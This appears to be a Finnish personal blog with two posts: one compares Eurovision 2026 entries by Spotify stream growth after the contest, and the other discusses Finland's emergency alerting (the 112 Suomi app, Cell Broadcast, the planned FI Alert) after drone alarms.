Mikään äänestystapa ei tunnu olevan oikea. Kansan ääniä voidaan manipuloida ja naapurimaat tunnetuisti äänestävät toisiaan. Kymmenen ääntä per katsoja on jo lähtökohtaisesti hölmö tilanne, eikä sitä voi mitenkään kontrolloida. Myös puhtaasti ammattilaisten valitsema voittaja herättäisi epäilyjä tuomaripelistä.

Kun kyse on musiikista ja makuasioista, mikään äänestysjärjestelmä ei anna aidosti oikeaa tulosta.

Mutta entä voittajan jo selvittyä? Kävin katsomassa kilpailun jälkeisenä päivänä Spotifystä kuuntelukertojen määrän. Olisi pitänyt toimia päivää aikaisemmin, näissä luvuissa oli mukana jo voittajan selvittyä tulleita kuuntelukertoja.

Italia ja Suomi erottuvat.

Italian kuuntelukertojen määrä oli omassa luokassaan, ilmeisesti kappale oli hyvin suosittu ainakin kotimaassaan. Myös Suomen kappaletta oli kuunneltu yli tuplasti enemmän kuin seuraavaa (Tanska).

Sivumennen sanoen pisti silmään, että Italian laulaja tarvitsi haastattelussa tulkin englantia varten. Pienen Suomen asukkailta tuntuu ihmeelliseltä, ettei suuren kielialueen suosittu artisti pärjää englannilla.

Aloin seurata kappaleiden suoratoistokertoja kolmen päivän ajan. Sitten tuli tauko ja valjastin työhön tekoälyn. Tänään on 8. päivä ja Bulgaria on voiton seurauksena kerännyt jo 18,1 miljoonaa kuuntelukertaa, Israel 10,2, Italia 31,1 ja Suomi 18,1 miljoonaa. Valitettavasti manuaalisesta seurannasta jäi puuttumaan muutama maa, joten niiden osalta tilasto alkaa vasta tekoälyn myötä 22.5.2026.

Kuuntelukerrat lähtötilanteen mukaan prosentteina.

Koska lähtötilanteet vaihtelivat niin paljon, absoluuttisten kuuntelumäärien vertailu ei ole mielekästä. Jos jokaisen maan kuuntelut ensimmäisenä päivänä skaalataan 100 prosenttiin, päivien mukaan saadaan seuraava grafiikka:

Kumulatiiviset kuuntelukerrat (ja tekoälyn virhe).

Bulgarian sininen käyrä on omaa luokkaansa ja kertoo Bangaranga-biisin aidosta suosiosta. Yllättäen kovasti kuuntelua lisäsi myös Ukraina. Sen kohdalla tekoäly on tehnyt virheen ja kuudennen päivän kuuntelukerrat ovat jopa pienempiä kuin kolmannen, mutta tämä virhe korjaantui seuraavissa päivissä. 

Matalat käyrät kertovat, että suosio oli hankittu lähinnä jo ennen kilpailua. Kahdeksannen päivän luvut: Bulgaria 417 %, Israel 166 %, Australia 184 %, Italia 115 %, Suomi 128 %, Tanska 156 %, Moldova 186 %, Ukraina 324 % ja Ranska 156 %. Romanian ja Kreikan luvut alkavat vasta 6. päivästä, joten ne eivät ole verrannollisia.

Jäädään kiinnostuneena odottamaan, miten äänestystä muutetaan ensi vuoden kilpailuihin. Mikään mittaustapa ei ole kiistaton eikä oikea.

Vaaratiedottaminen ja EU Alert, sekoilua ja sekaannuksia

Tiedottaminen on vaikea laji, vaaratiedottaminen vielä astetta vaikeampi. Tämän voi totisesti allekirjoittaa seurattuaan drone-hälytyksistä noussutta sotkua. Me uskomme, että Suomessa viranomaiset toimivat oikein ja vihamielinen vaikuttaminen kilpistyy kansan lukutaitoon ja sivistykseen. Jaa-a, enpä tiedä.

Pääsiäisen aikaan Suomen metsistä löytyi kaksi ukrainalaista dronea, joista aiheutui melkoinen soppa. Alettiin kysyä, miten Suomi varoittaa kansalaisiaan droonivaarasta ja miten harhautuneisiin droneihin ylipäätään voi varautua. Osuman riski on kuitenkin minimaalisen pieni.

Viimeistään silloin kävi ilmi, että Suomi luottaa vaaratiedottamisessa yhä Ylen radiokanavaan, teksti-TV:hen ja nettisivuun. Mobiilisovellus 112 Suomi oli aloittaessaan 2015 hyvä ratkaisu, koska se lähetti avuntarvitsijan tarkan sijainnin hätäkeskukseen, mutta sen jälkeen puhelimiin tuli AML-tekniikka ja nykyään tieto näkyy hälytyskeskukseen automaattisesti. Soittajaa ei enää tarvitse paikantaa tukiasemien perusteella eikä käyttää 112 Suomea.

Käyttäjien asenne mobiilisovelluksia kohtaan tiukkeni ja käyttöjärjestelmän asetukset muuttuivat, minkä vuoksi 112 Suomen vaarahälytykset eivät enää tavoittaneet kaikki sovelluksen asentaneita. 

Muista EU-maista poiketen Suomi ei käyttänyt Cell Broadcast -hälytystekniikkaa, joka oli standardoitu jo 1990-luvulla. Ensimmäinen EU-toteutus oli Hollannin NL Alert 2012. CB ei käytä hitaita ja kalliita tekstiviestejä, vaan tukiasema tuuppaa viestin kaikkiin alueellaan oleviin päätelaitteisiin näiden numerosta riippumatta. Siten myös turistit saavat vaarailmoitukset.

Puute oli niin suuri, että EU Alertin käyttöönottoa varten perustettiin 8.4.2026 kansalaisaloite. Se ehti kerätä allekirjoituksia vain muutaman päivän kun jo tuli tieto, että Suomi onkin aloittanut EU Alertin kansallisen version ("FI Alert") kehittämisen ja sen pitäisi valmistua vuoden 2027 loppuun mennessä. Oli varmaan ensimmäinen kerta, kun kansalaisaloite saavutti tavoitteensa jo viikko perustamisen jälkeen, vaikka allekirjoituksia oli ehtinyt kertyä vasta kolme tuhatta.

Mikään näistä ei kiinnostanut mediaa; vain Yle teki juttua aiheesta jo pääsiäisen aikana. 

Viime perjantain droonihälytys räjäytti potin. Yhtäkkiä kaikki halusivat tietää, mitä ovat CB, EU Alert ja miksei Suomella ole sellaista. Tänään Hesari oli kaivanut perusteluita myös ministeriöstä ja saanut vältteleviä vastauksia, joissa kuitenkin toistui taikasana: "raha". 

Yllättäen onkin käynyt ilmi, että nykyinen hallitus oli vihdoin, yli 20 vuoden väännön jälkeen, antanut jo viime vuonna kuuden miljoonan euron määrärahan "FI Alert" kehittämiseksi. Perjantain hälytyksen jälkeen aikataulua on kiristetty vuoden 2027 alkuun, jota sitäkin poliitikot moittivat hitaaksi. Samat poliitikot, jotka itse ovat olleet v. 2020 päättämässä ettei EU Alertia oteta käyttöön, vaan jatketaan 112 Suomi -sovelluksella, ja jotka ovat torpanneet määrärahat paremman järjestelmän kehittämiseksi.

Vaikka FI Alert on periaatteessa yksinkertainen, se vaatii muutoksia & sopimuksia operaattorien verkkoihin. Siksi aikataulu vuoden 2027 alkuun on kunnianhimoinen. Operaattorien pitää ehkä päivittää laitteita, ainakin ohjelmistoja, ja viranomaisten integroida alueellinen hälytys nykyiseen monikanavaiseen (radio, tv, teksti-tv, nettisivu, sireenit) järjestelmään.

Jokseenkin ironista on se, että mikäli FI Alert olisi ollut viime perjantaina käytössä, se olisi vain pahentanut asioita. Miljoonaa suomalaista ei kannattanut herättää aamuneljältä epämääräisen drooniuhkan vuoksi, joka ei koskaan edes toteutunut. 

Ensi kerralla voi olla toisin, ja siksi mobiili vaaratiedotus on syytä laittaa vihdoin kuntoon. 112 Suomi voi jäädä yleiseksi apuohjelmaksi, joka välittää myös kohdennettuja tietoja liikenneonnettomuuksista (jos paikannus on sallittu).

112 Suomi ja kohdennetut liikennetiedotteet

Vielä pari asiaa drooneista: ei, emme voi ottaa käyttöön Ukrainassa kehitettyä varoitussovellusta. Se on tarkoitettu aktiivisen ja kohdennetun droonihyökkäyksen varalle. Ukrainalaisilla on aito tarve pitää sovellus aktiivisena puhelimessaan, koska heidän henkensä voi riippua siitä. Ihan eri tilanne kuin Suomessa, jossa kyse on yksittäisestä harhautuneesta droonista tai pelosta, että sellainen saattaa tulla.

Drooneja ei myöskään ole helppo ampua alas Suomen ilmatilan rajalla. Jos olisi, eivät Venäjä ja Ukraina antaisi niiden tappaa kansalaisiaan. Pienikokoinen, hidas ja matalalla lentävä drooni on vaike havaita tutkalla, koska ne on ajateltu erilaisia maaleja vastaan. Hävittäjät ovat liian nopeita ja ohjukset turhan kalliita droonien pudottamiseen. Asutuksen yläpuolella torjunta on vaarallisempaa kuin se, että lennon annetaan jatkua. 

Tämä on uusi tilanne kaikille, niin sotilaille, kansalaisille, poliitikoille kuin mediallekin. Nyt jäitä hattuun ja asioita parantamaan. Hosumisesta ei ole mitään hyötyä. 

Lisäys 20.5.2026: 112 Suomen toimivuuden näkee siitä, tulevatko liikennetiedotteet näytölle (olettaen, että niille on annettu luvat). 

Tähän 112 Suomi sopii: kohdennetut liikennetiedotteet tulevat näytölle.

Jos liikennetiedotteet tulevat, pitäisi myös mahdollisten droonihälytysten näkyä.

Lisäys: Ylen ansiokas selvitys vaaratiedottamisen historiasta: miten tsunamista ja tekstiviesteistä päädyttiin 112 Suomen kautta droneihin ja solulähetyksiin.